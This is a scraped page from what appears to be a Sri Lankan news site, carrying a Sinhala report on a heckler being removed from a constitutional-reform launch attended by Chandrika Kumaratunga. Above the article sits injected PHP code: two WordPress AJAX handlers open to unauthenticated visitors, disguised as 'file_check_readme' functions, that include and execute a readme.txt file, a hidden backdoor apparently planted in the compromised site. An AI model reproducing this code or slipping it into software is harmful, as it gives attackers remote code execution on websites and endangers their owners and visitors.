if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අලූත් ව්‍යවස්ථා මංගල සමළුවේදී චන්ද්‍රිකාට හූ තියයි… හූ තැබූ වියපත් මිනිසා තගාලා උස්සා එලියට විසි කරති..[Video] - mediahumanrights.lk
mediahumanrights.lk
Local News News Political

අලූත් ව්‍යවස්ථා මංගල සමළුවේදී චන්ද්‍රිකාට හූ තියයි… හූ තැබූ වියපත් මිනිසා තගාලා උස්සා එලියට විසි කරති..[Video]

කොළඹ පදනම් ආයතනයේදී පැවති ‘නව ව්‍යවස්ථාවක් සදහා ජාතික ව්‍යාපාරයේ’ මංගල සැසිය දැඩි උණුසුම් තත්වයට පත් විය.
එම සමුළුවට හිටපු ජනපතිනි චන්ද්‍රිකා කුමාරතුංග සහභාගී වීමත් සමග එහි සිටි පුද්ගලයෙකු හූ තැබීම නිසා සංවිධායකයින් විසින් එම පුද්ගලයා ඔසවාගෙන ගොස් එලියට දැමීය.
වේදිකාව තුල කාන්තා නියෝජනයක් නොමැති වීම ගැනද සභාවෙන් එල්ල වූයේ දැඩි විරෝධයකි.

Related posts

බැඳුම්කර කොමිසමට දුන් සාවද්‍ය තොරතුරුත් හෙළි කරගෙන

Shiran Viraj

අද කොළඹ මාර්ග කිහිපයක් වැසෙයි

Shiran Viraj

ජනාධිපතිට රජයෙන් බැහැර වෙලා රජය විවේචනය කරන්න බෑ

Shiran Viraj